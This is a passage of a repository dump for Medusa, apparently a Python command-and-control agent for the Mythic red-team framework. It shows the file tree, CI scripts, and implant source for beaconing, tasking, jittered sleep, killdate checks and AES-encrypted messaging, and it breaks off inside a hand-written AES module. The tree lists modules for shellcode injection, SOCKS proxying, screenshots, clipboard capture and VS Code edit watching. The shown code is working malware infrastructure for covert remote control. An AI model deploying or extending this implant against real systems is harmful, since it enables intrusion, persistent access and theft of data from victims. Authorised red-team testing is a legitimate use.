Repository: MythicAgents/Medusa Branch: master Commit: 319866bf8e6d Files: 172 Total size: 440.9 KB Directory structure: gitextract_rqvfv1v_/ ├── .github/ │ ├── scripts/ │ │ └── matrix-test-builder.py │ └── workflows/ │ └── payload-build-matrix.yml ├── .gitignore ├── C2_Profiles/ │ └── .keep ├── Payload_Type/ │ └── medusa/ │ ├── Dockerfile │ ├── main.py │ ├── medusa/ │ │ ├── __init__.py │ │ ├── agent_code/ │ │ │ ├── base_agent/ │ │ │ │ ├── base_agent_core.py2 │ │ │ │ ├── base_agent_core.py3 │ │ │ │ ├── crypto_lib.py2 │ │ │ │ ├── crypto_lib.py3 │ │ │ │ ├── manual_crypto.py2 │ │ │ │ ├── manual_crypto.py3 │ │ │ │ ├── transport_azure_blob.py2 │ │ │ │ ├── transport_azure_blob.py3 │ │ │ │ ├── transport_http.py2 │ │ │ │ └── transport_http.py3 │ │ │ ├── cat.py │ │ │ ├── cd.py │ │ │ ├── clipboard.py2 │ │ │ ├── cp.py │ │ │ ├── cwd.py │ │ │ ├── download.py │ │ │ ├── download_bulk.py │ │ │ ├── env.py │ │ │ ├── eval_code.py │ │ │ ├── exit.py │ │ │ ├── jobkill.py │ │ │ ├── jobs.py │ │ │ ├── kill.py3 │ │ │ ├── list_apps.py2 │ │ │ ├── list_dlls.py3 │ │ │ ├── list_modules.py │ │ │ ├── list_tcc.py │ │ │ ├── load.py │ │ │ ├── load_dll.py │ │ │ ├── load_module.py2 │ │ │ ├── load_module.py3 │ │ │ ├── load_script.py │ │ │ ├── ls.py2 │ │ │ ├── ls.py3 │ │ │ ├── mv.py │ │ │ ├── pip_freeze.py │ │ │ ├── ps.py2 │ │ │ ├── ps.py3 │ │ │ ├── ps_full.py3 │ │ │ ├── rm.py │ │ │ ├── screenshot.py2 │ │ │ ├── shell.py │ │ │ ├── shinject.py │ │ │ ├── sleep.py │ │ │ ├── socks.py2 │ │ │ ├── socks.py3 │ │ │ ├── spawn_jxa.py │ │ │ ├── unload.py │ │ │ ├── unload_module.py │ │ │ ├── upload.py │ │ │ ├── vscode_list_recent.py │ │ │ ├── vscode_open_edits.py │ │ │ ├── vscode_watch_edits.py │ │ │ └── watch_dir.py │ │ └── mythic/ │ │ ├── __init__.py │ │ ├── agent_functions/ │ │ │ ├── __init__.py │ │ │ ├── builder.py │ │ │ ├── cat.py │ │ │ ├── cd.py │ │ │ ├── clipboard.py │ │ │ ├── cp.py │ │ │ ├── cwd.py │ │ │ ├── download.py │ │ │ ├── download_bulk.py │ │ │ ├── env.py │ │ │ ├── eval_code.py │ │ │ ├── exit.py │ │ │ ├── jobkill.py │ │ │ ├── jobs.py │ │ │ ├── kill.py │ │ │ ├── list_apps.py │ │ │ ├── list_dlls.py │ │ │ ├── list_modules.py │ │ │ ├── list_tcc.py │ │ │ ├── load.py │ │ │ ├── load_dll.py │ │ │ ├── load_module.py │ │ │ ├── load_script.py │ │ │ ├── ls.py │ │ │ ├── mv.py │ │ │ ├── pip_freeze.py │ │ │ ├── ps.py │ │ │ ├── ps_full.py │ │ │ ├── rm.py │ │ │ ├── screenshot.py │ │ │ ├── shell.py │ │ │ ├── shinject.py │ │ │ ├── sleep.py │ │ │ ├── socks.py │ │ │ ├── spawn_jxa.py │ │ │ ├── unload.py │ │ │ ├── unload_module.py │ │ │ ├── upload.py │ │ │ ├── vscode_list_recent.py │ │ │ ├── vscode_open_edits.py │ │ │ ├── vscode_watch_edits.py │ │ │ └── watch_dir.py │ │ └── browser_scripts/ │ │ ├── copy_additional_info_to_clipboard.js │ │ ├── create_table.js │ │ ├── download.js │ │ ├── download_bulk.js │ │ ├── file_size_to_human_readable_string.js │ │ ├── jobs.js │ │ ├── list_apps.js │ │ ├── list_dlls.js │ │ ├── ls.js │ │ ├── ps.js │ │ ├── ps_full.js │ │ ├── screenshot.js │ │ ├── tcc.js │ │ ├── vscode_edits.js │ │ └── vscode_recent.js │ └── rabbitmq_config.json ├── README.md ├── config.json ├── documentation-c2/ │ └── .keep ├── documentation-payload/ │ ├── .keep │ └── medusa/ │ ├── _index.md │ ├── c2_profiles/ │ │ ├── Azure_Blob.md │ │ ├── HTTP.md │ │ └── _index.md │ ├── commands/ │ │ ├── _index.md │ │ ├── cat.md │ │ ├── cd.md │ │ ├── clipboard.md │ │ ├── cp.md │ │ ├── cwd.md │ │ ├── download.md │ │ ├── download_bulk.md │ │ ├── env.md │ │ ├── eval_code.md │ │ ├── exit.md │ │ ├── jobs.md │ │ ├── kill.md │ │ ├── list_apps.md │ │ ├── list_dlls.md │ │ ├── list_modules.md │ │ ├── list_tcc.md │ │ ├── load.md │ │ ├── load_dll.md │ │ ├── load_module.md │ │ ├── load_script.md │ │ ├── ls.md │ │ ├── mv.md │ │ ├── pip_freeze.md │ │ ├── ps.md │ │ ├── ps_full.md │ │ ├── rm.md │ │ ├── screenshot.md │ │ ├── shell.md │ │ ├── shinject.md │ │ ├── sleep.md │ │ ├── socks.md │ │ ├── spawn_jxa.md │ │ ├── unload.md │ │ ├── unload_module.md │ │ ├── upload.md │ │ ├── vscode_list_recent.md │ │ ├── vscode_open_edits.md │ │ ├── vscode_watch_edits.md │ │ └── watch_dir.md │ ├── development.md │ └── opsec.md ├── documentation-wrapper/ │ └── .keep └── tests/ └── test_payload_build_matrix.py ================================================ FILE CONTENTS ================================================ ================================================ FILE: .github/scripts/matrix-test-builder.py ================================================ #!/usr/bin/env python3 import json import os import pathlib import re import sys def discover_profiles(base_agent_path: pathlib.Path): py2_profiles = { re.match(r"transport_(.+)\.py2$", p.name).group(1) for p in base_agent_path.glob("transport_*.py2") if re.match(r"transport_(.+)\.py2$", p.name) } py3_profiles = { re.match(r"transport_(.+)\.py3$", p.name).group(1) for p in base_agent_path.glob("transport_*.py3") if re.match(r"transport_(.+)\.py3$", p.name) } return sorted(py2_profiles.intersection(py3_profiles)) def build_matrix(profiles): python_versions = ["Python 2.7", "Python 3.8"] crypto_impls = ["manual_crypto", "cryptography_lib"] return { "include": [ { "profile": profile, "python_version": python_version, "crypto_impl": crypto_impl, } for profile in profiles for python_version in python_versions for crypto_impl in crypto_impls ] } def main(): repo_root = pathlib.Path(__file__).resolve().parents[2] base_agent = repo_root / "Payload_Type" / "medusa" / "medusa" / "agent_code" / "base_agent" profiles = discover_profiles(base_agent) matrix = build_matrix(profiles) matrix_json = json.dumps(matrix) github_output = os.environ.get("GITHUB_OUTPUT", "").strip() if github_output: with open(github_output, "a", encoding="utf-8") as f: f.write(f"matrix={matrix_json}\n") else: sys.stdout.write(matrix_json + "\n") if __name__ == "__main__": main() ================================================ FILE: .github/workflows/payload-build-matrix.yml ================================================ name: Payload Build Matrix on: pull_request: branches: - main push: branches: - dev permissions: contents: read concurrency: group: payload-build-matrix-${{ github.ref }} cancel-in-progress: true jobs: discover-combos: runs-on: ubuntu-latest outputs: matrix: ${{ steps.discover.outputs.matrix }} steps: - name: Checkout uses: actions/checkout@v4 - name: Setup Python uses: actions/setup-python@v5 with: python-version: "3.11" - name: Discover supported build combinations id: discover run: | python .github/scripts/matrix-test-builder.py build-matrix: needs: discover-combos runs-on: ubuntu-latest timeout-minutes: 15 strategy: fail-fast: false matrix: ${{ fromJSON(needs.discover-combos.outputs.matrix) }} steps: - name: Checkout uses: actions/checkout@v4 - name: Setup Python uses: actions/setup-python@v5 with: python-version: "3.11" - name: Run payload build tests for combo env: TEST_PROFILE: ${{ matrix.profile }} TEST_PYTHON_VERSION: ${{ matrix.python_version }} TEST_CRYPTO_IMPL: ${{ matrix.crypto_impl }} run: | python -m unittest tests/test_payload_build_matrix.py -v ================================================ FILE: .gitignore ================================================ *.DS_Store __pycache__/ ================================================ FILE: C2_Profiles/.keep ================================================ ================================================ FILE: Payload_Type/medusa/Dockerfile ================================================ FROM itsafeaturemythic/mythic_python_base:latest WORKDIR /Mythic/ CMD ["python3", "main.py"] ================================================ FILE: Payload_Type/medusa/main.py ================================================ import mythic_container import asyncio from medusa.mythic import * mythic_container.mythic_service.start_and_run_forever() ================================================ FILE: Payload_Type/medusa/medusa/__init__.py ================================================ ================================================ FILE: Payload_Type/medusa/medusa/agent_code/base_agent/base_agent_core.py2 ================================================ import os, random, sys, json, socket, base64, time, platform, ssl, getpass from datetime import datetime import threading from Queue import Queue TRANSPORT_IMPORTS CHUNK_SIZE = 51200 CRYPTO_HERE def getOSVersion(self): if platform.mac_ver()[0]: return "macOS "+platform.mac_ver()[0] else: return platform.system() + " " + platform.release() def getUsername(self): try: return getpass.getuser() except: pass for k in [ "USER", "LOGNAME", "USERNAME" ]: if k in os.environ.keys(): return os.environ[k] TRANSPORT_CLASS_FIELDS def formatMessage(self, data, urlsafe=False): uuid_to_use = self.agent_config["UUID"] if uuid_to_use == "": uuid_to_use = self.agent_config["PayloadUUID"] output = base64.b64encode(uuid_to_use.encode() + self.encrypt(json.dumps(data).encode())) if urlsafe: output = base64.urlsafe_b64encode(uuid_to_use.encode() + self.encrypt(json.dumps(data).encode())) return output def formatResponse(self, data): uuid_to_use = self.agent_config["UUID"] if uuid_to_use == "": uuid_to_use = self.agent_config["PayloadUUID"] if isinstance(data, bytes): decoded = data.decode() else: decoded = data cleaned = decoded.replace(uuid_to_use, "") if not cleaned or cleaned.strip() == "": return {} return json.loads(cleaned) TRANSPORT_FUNCTIONS def sendTaskOutputUpdate(self, task_id, output): responses = [{ "task_id": task_id, "user_output": output, "completed": False }] message = { "action": "post_response", "responses": responses } response_data = self.postMessageAndRetrieveResponse(message) if "socks" in response_data: for packet in response_data["socks"]: self.socks_in.put(packet) def postResponses(self): try: responses = [] socks = [] taskings = self.taskings for task in taskings: if task["completed"] == True: out = { "task_id": task["task_id"], "user_output": task["result"], "completed": True } if task["error"]: out["status"] = "error" for func in ["processes", "file_browser"]: if func in task: out[func] = task[func] responses.append(out) while not self.socks_out.empty(): socks.append(self.socks_out.get()) if ((len(responses) > 0) or (len(socks) > 0)): message = { "action": "post_response", "responses": responses } if socks: message["socks"] = socks response_data = self.postMessageAndRetrieveResponse(message) for resp in response_data["responses"]: task_index = [t for t in self.taskings \ if resp["task_id"] == t["task_id"] \ and resp["status"] == "success"][0] self.taskings.pop(self.taskings.index(task_index)) if "socks" in response_data: for packet in response_data["socks"]: self.socks_in.put(packet) except: pass def processTask(self, task): try: task["started"] = True function = getattr(self, task["command"], None) if(callable(function)): try: params = json.loads(task["parameters"]) if task["parameters"] else {} params['task_id'] = task["task_id"] command = "self." + task["command"] + "(**params)" output = eval(command) except Exception as error: output = str(error) task["error"] = True task["result"] = output task["completed"] = True else: task["error"] = True task["completed"] = True task["result"] = "Function unavailable." except Exception as error: task["error"] = True task["completed"] = True task["result"] = error def processTaskings(self): threads = list() taskings = self.taskings for task in taskings: if task["started"] == False: x = threading.Thread(target=self.processTask, name="{}:{}".format(task["command"], task["task_id"]), args=(task,)) threads.append(x) x.start() def getTaskings(self): data = { "action": "get_tasking", "tasking_size": -1 } tasking_data = self.getMessageAndRetrieveResponse(data) for task in tasking_data["tasks"]: t = { "task_id":task["id"], "command":task["command"], "parameters":task["parameters"], "result":"", "completed": False, "started":False, "error":False, "stopped":False } self.taskings.append(t) if "socks" in tasking_data: for packet in tasking_data["socks"]: self.socks_in.put(packet) def passedKilldate(self): kd_list = [ int(x) for x in self.agent_config["KillDate"].split("-")] kd = datetime(kd_list[0], kd_list[1], kd_list[2]) if datetime.now() >= kd: return True else: return False def agentSleep(self): j = 0 if int(self.agent_config["Jitter"]) > 0: v = float(self.agent_config["Sleep"]) * (float(self.agent_config["Jitter"])/100) if int(v) > 0: j = random.randrange(0, int(v)) time.sleep(self.agent_config["Sleep"]+j) #COMMANDS_HERE def __init__(self): self.socks_open = {} self.socks_in = Queue() self.socks_out = Queue() self.taskings = [] self._meta_cache = {} self.moduleRepo = {} self.current_directory = os.getcwd() self.agent_config = { "PayloadUUID": "UUID_HERE", "UUID": "", "KillDate": "killdate", "enc_key": AESPSK, "ExchChk": "encrypted_exchange_check", "ProxyHost": "proxy_host", "ProxyUser": "proxy_user", "ProxyPass": "proxy_pass", "ProxyPort": "proxy_port", TRANSPORT_CONFIG } while True: if(self.agent_config["UUID"] == ""): self.checkIn() self.agentSleep() else: while True: if self.passedKilldate(): self.exit(None) try: self.getTaskings() self.processTaskings() self.postResponses() except: pass self.agentSleep() if __name__ == "__main__": medusa = medusa() ================================================ FILE: Payload_Type/medusa/medusa/agent_code/base_agent/base_agent_core.py3 ================================================ import os, random, sys, json, socket, base64, time, platform, ssl, getpass from datetime import datetime import threading, queue TRANSPORT_IMPORTS CHUNK_SIZE = 51200 CRYPTO_HERE def getOSVersion(self): if platform.mac_ver()[0]: return "macOS "+platform.mac_ver()[0] else: return platform.system() + " " + platform.release() def getUsername(self): try: return getpass.getuser() except: pass for k in [ "USER", "LOGNAME", "USERNAME" ]: if k in os.environ.keys(): return os.environ[k] TRANSPORT_CLASS_FIELDS def formatMessage(self, data, urlsafe=False): uuid_to_use = self.agent_config["UUID"] if uuid_to_use == "": uuid_to_use = self.agent_config["PayloadUUID"] output = base64.b64encode(uuid_to_use.encode() + self.encrypt(json.dumps(data).encode())) if urlsafe: output = base64.urlsafe_b64encode(uuid_to_use.encode() + self.encrypt(json.dumps(data).encode())) return output def formatResponse(self, data): uuid_to_use = self.agent_config["UUID"] if uuid_to_use == "": uuid_to_use = self.agent_config["PayloadUUID"] if isinstance(data, bytes): decoded = data.decode() else: decoded = data cleaned = decoded.replace(uuid_to_use, "") if not cleaned or cleaned.strip() == "": return {} return json.loads(cleaned) TRANSPORT_FUNCTIONS def sendTaskOutputUpdate(self, task_id, output): responses = [{ "task_id": task_id, "user_output": output, "completed": False }] message = { "action": "post_response", "responses": responses } response_data = self.postMessageAndRetrieveResponse(message) if "socks" in response_data: for packet in response_data["socks"]: self.socks_in.put(packet) def postResponses(self): try: responses = [] socks = [] taskings = self.taskings for task in taskings: if task["completed"] == True: out = { "task_id": task["task_id"], "user_output": task["result"], "completed": True } if task["error"]: out["status"] = "error" for func in ["processes", "file_browser"]: if func in task: out[func] = task[func] responses.append(out) while not self.socks_out.empty(): socks.append(self.socks_out.get()) if ((len(responses) > 0) or (len(socks) > 0)): message = { "action": "post_response", "responses": responses } if socks: message["socks"] = socks response_data = self.postMessageAndRetrieveResponse(message) for resp in response_data["responses"]: task_index = [t for t in self.taskings \ if resp["task_id"] == t["task_id"] \ and resp["status"] == "success"][0] self.taskings.pop(self.taskings.index(task_index)) if "socks" in response_data: for packet in response_data["socks"]: self.socks_in.put(packet) except: pass def processTask(self, task): try: task["started"] = True function = getattr(self, task["command"], None) if(callable(function)): try: params = json.loads(task["parameters"]) if task["parameters"] else {} params['task_id'] = task["task_id"] command = "self." + task["command"] + "(**params)" output = eval(command) except Exception as error: output = str(error) task["error"] = True task["result"] = output task["completed"] = True else: task["error"] = True task["completed"] = True task["result"] = "Function unavailable." except Exception as error: task["error"] = True task["completed"] = True task["result"] = error def processTaskings(self): threads = list() taskings = self.taskings for task in taskings: if task["started"] == False: x = threading.Thread(target=self.processTask, name="{}:{}".format(task["command"], task["task_id"]), args=(task,)) threads.append(x) x.start() def getTaskings(self): data = { "action": "get_tasking", "tasking_size": -1 } tasking_data = self.getMessageAndRetrieveResponse(data) for task in tasking_data["tasks"]: t = { "task_id":task["id"], "command":task["command"], "parameters":task["parameters"], "result":"", "completed": False, "started":False, "error":False, "stopped":False } self.taskings.append(t) if "socks" in tasking_data: for packet in tasking_data["socks"]: self.socks_in.put(packet) def passedKilldate(self): kd_list = [ int(x) for x in self.agent_config["KillDate"].split("-")] kd = datetime(kd_list[0], kd_list[1], kd_list[2]) if datetime.now() >= kd: return True else: return False def agentSleep(self): j = 0 if int(self.agent_config["Jitter"]) > 0: v = float(self.agent_config["Sleep"]) * (float(self.agent_config["Jitter"])/100) if int(v) > 0: j = random.randrange(0, int(v)) time.sleep(self.agent_config["Sleep"]+j) #COMMANDS_HERE def __init__(self): self.socks_open = {} self.socks_in = queue.Queue() self.socks_out = queue.Queue() self.taskings = [] self._meta_cache = {} self.moduleRepo = {} self.current_directory = os.getcwd() self.agent_config = { "PayloadUUID": "UUID_HERE", "UUID": "", "KillDate": "killdate", "enc_key": AESPSK, "ExchChk": "encrypted_exchange_check", "ProxyHost": "proxy_host", "ProxyUser": "proxy_user", "ProxyPass": "proxy_pass", "ProxyPort": "proxy_port", TRANSPORT_CONFIG } while True: if(self.agent_config["UUID"] == ""): self.checkIn() self.agentSleep() else: while True: if self.passedKilldate(): self.exit(None) try: self.getTaskings() self.processTaskings() self.postResponses() except: pass self.agentSleep() if __name__ == "__main__": medusa = medusa() ================================================ FILE: Payload_Type/medusa/medusa/agent_code/base_agent/crypto_lib.py2 ================================================ class medusa: def encrypt(self, data): from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from cryptography.hazmat.primitives import hashes, hmac, padding from cryptography.hazmat.backends import default_backend if not self.agent_config["enc_key"]["value"] == "none" and len(data)>0: key = base64.b64decode(self.agent_config["enc_key"]["enc_key"]) iv = os.urandom(16) backend = default_backend() cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend) encryptor = cipher.encryptor() padder = padding.PKCS7(128).padder() padded_data = padder.update(data) padded_data += padder.finalize() ct = encryptor.update(padded_data) + encryptor.finalize() h = hmac.HMAC(key, hashes.SHA256(), backend) h.update(iv + ct) hmac = h.finalize() output = iv + ct + hmac return output else: return data def decrypt(self, data): from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from cryptography.hazmat.primitives import hashes, hmac, padding from cryptography.hazmat.backends import default_backend if not self.agent_config["enc_key"]["value"] == "none": if len(data)>0: backend = default_backend() key = base64.b64decode(self.agent_config["enc_key"]["dec_key"]) uuid = data[:36] iv = data[36:52] ct = data[52:-32] received_hmac = data[-32:] h = hmac.HMAC(key, hashes.SHA256(), backend) h.update(iv + ct) hmac = h.finalize() if base64.b64encode(hmac) == base64.b64encode(received_hmac): cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend) decryptor = cipher.decryptor() pt = decryptor.update(ct) + decryptor.finalize() unpadder = padding.PKCS7(128).unpadder() decrypted_data = unpadder.update(pt) decrypted_data += unpadder.finalize() return (uuid+decrypted_data).decode() else: return "" else: return "" else: return data.decode() ================================================ FILE: Payload_Type/medusa/medusa/agent_code/base_agent/crypto_lib.py3 ================================================ class medusa: def encrypt(self, data): from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from cryptography.hazmat.primitives import hashes, hmac, padding from cryptography.hazmat.backends import default_backend if not self.agent_config["enc_key"]["value"] == "none" and len(data)>0: key = base64.b64decode(self.agent_config["enc_key"]["enc_key"]) iv = os.urandom(16) backend = default_backend() cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend) encryptor = cipher.encryptor() padder = padding.PKCS7(128).padder() padded_data = padder.update(data) padded_data += padder.finalize() ct = encryptor.update(padded_data) + encryptor.finalize() h = hmac.HMAC(key, hashes.SHA256(), backend) h.update(iv + ct) hmac = h.finalize() output = iv + ct + hmac return output else: return data def decrypt(self, data): from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from cryptography.hazmat.primitives import hashes, hmac, padding from cryptography.hazmat.backends import default_backend if not self.agent_config["enc_key"]["value"] == "none": if len(data)>0: backend = default_backend() key = base64.b64decode(self.agent_config["enc_key"]["dec_key"]) uuid = data[:36] iv = data[36:52] ct = data[52:-32] received_hmac = data[-32:] h = hmac.HMAC(key, hashes.SHA256(), backend) h.update(iv + ct) hmac = h.finalize() if base64.b64encode(hmac) == base64.b64encode(received_hmac): cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend) decryptor = cipher.decryptor() pt = decryptor.update(ct) + decryptor.finalize() unpadder = padding.PKCS7(128).unpadder() decrypted_data = unpadder.update(pt) decrypted_data += unpadder.finalize() return (uuid+decrypted_data).decode() else: return "" else: return "" else: return data.decode() ================================================ FILE: Payload_Type/medusa/medusa/agent_code/base_agent/manual_crypto.py2 ================================================ s_box = ( 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16, ) inv_s_box = ( 0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB, 0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB, 0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E, 0x08, 0x2E, 0xA1, 0x66, 0x28, 0xD9, 0x24, 0xB2, 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25, 0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92, 0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84, 0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06, 0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B, 0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73, 0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E, 0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B, 0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4, 0x1F, 0xDD, 0xA8, 0x33, 0x88, 0x07, 0xC7, 0x31, 0xB1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xEC, 0x5F, 0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, 0x2D, 0xE5, 0x7A, 0x9F, 0x93, 0xC9, 0x9C, 0xEF, 0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, 0xC8, 0xEB, 0xBB, 0x3C, 0x83, 0x53, 0x99, 0x61, 0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, 0xE1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0C, 0x7D, ) def sub_bytes(s): for i in range(4): for j in range(4): s[i][j] = s_box[s[i][j]] def inv_sub_bytes(s): for i in range(4): for j in range(4): s[i][j] = inv_s_box[s[i][j]] def shift_rows(s): s[0][1], s[1][1], s[2][1], s[3][1] = s[1][1], s[2][1], s[3][1], s[0][1] s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2] s[0][3], s[1][3], s[2][3], s[3][3] = s[3][3], s[0][3], s[1][3], s[2][3] def inv_shift_rows(s): s[0][1], s[1][1], s[2][1], s[3][1] = s[3][1], s[0][1], s[1][1], s[2][1] s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2] s[0][3], s[1][3], s[2][3], s[3][3] = s[1][3], s[2][3], s[3][3], s[0][3] def add_round_key(s, k): for i in range(4): for j in range(4): s[i][j] ^= k[i][j] xtime = lambda a: (((a << 1) ^ 0x1B) & 0xFF) if (a & 0x80) else (a << 1) def mix_single_column(a): t = a[0] ^ a[1] ^ a[2] ^ a[3] u = a[0] a[0] ^= t ^ xtime(a[0] ^ a[1]) a[1] ^= t ^ xtime(a[1] ^ a[2]) a[2] ^= t ^ xtime(a[2] ^ a[3]) a[3] ^= t ^ xtime(a[3] ^ u) def mix_columns(s): for i in range(4): mix_single_column(s[i]) def inv_mix_columns(s): for i in range(4): u = xtime(xtime(s[i][0] ^ s[i][2])) v = xtime(xtime(s[i][1] ^ s[i][3])) s[i][0] ^= u s[i][1] ^= v s[i][2] ^= u s[i][3] ^= v mix_columns(s) r_con = ( 0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, ) def bytes2matrix(text): return [list([ord(x) for x in text[i:i+4]]) for i in range(0, len(text), 4)] def bytes2amatrix(text): return [list([x for x in text[i:i+4]]) for i in range(0, len(text), 4)] def matrix2bytes(matrix): return [chr(x) for x in sum(matrix, [])] def xor_bytes(a, b, as_chr=False): out = [] for i, j in zip(a, b): if isinstance(i, basestring): i = ord(i) if isinstance(j, basestring): j = ord(j) out.append(chr(i^j)) if as_chr else out.append(i^j) return out def inc_bytes(a): out = list(a) for i in reversed(range(len(out))): if out[i] == 0xFF: out[i] = 0 else: out[i] += 1 break return bytes(out) def pad(plaintext): padding_len = 16 - (len(plaintext) % 16) padding = bytes(chr(padding_len) * padding_len) return plaintext + padding def unpad(plaintext): padding_len = ord(plaintext[-1]) assert padding_len > 0 message, padding = plaintext[:-padding_len], plaintext[-padding_len:] assert all(p == chr(padding_len) for p in padding) return message def split_blocks(message, block_size=16, require_padding=True): assert len(message) % block_size == 0 or not require_padding return [message[i:i+16] for i in range(0, len(message), block_size)] class AES: rounds_by_key_size = {16: 10, 24: 12, 32: 14} def __init__(self, master_key): assert len(master_key) in AES.rounds_by_key_size self.n_rounds = AES.rounds_by_key_size[len(master_key)] self._key_matrices = self._expand_key(master_key) def _expand_key(self, master_key): key_columns = bytes2matrix(master_key) iteration_size = len(master_key) // 4 columns_per_iteration = len(key_columns) i = 1 while len(key_columns) < (self.n_rounds + 1) * 4: word = list(key_columns[-1]) if len(key_columns) % iteration_size == 0: word.append(word.pop(0)) word = [s_box[b] for b in word] word[0] ^= r_con[i] i += 1 elif len(master_key) == 32 and len(key_columns) % iteration_size == 4: word = [s_box[b] for b in word] word = xor_bytes(word, key_columns[-iteration_size]) key_columns.append(word) return [key_columns[4*i : 4*(i+1)] for i in range(len(key_columns) // 4)] def encrypt_block(self, plaintext): assert len(plaintext) == 16 plain_state = bytes2amatrix(plaintext) add_round_key(plain_state, self._key_matrices[0]) for i in range(1, self.n_rounds): sub_bytes(plain_state) shift_rows(plain_state) mix_columns(plain_state) add_round_key(plain_state, self._key_matrices[i]) sub_bytes(plain_state) 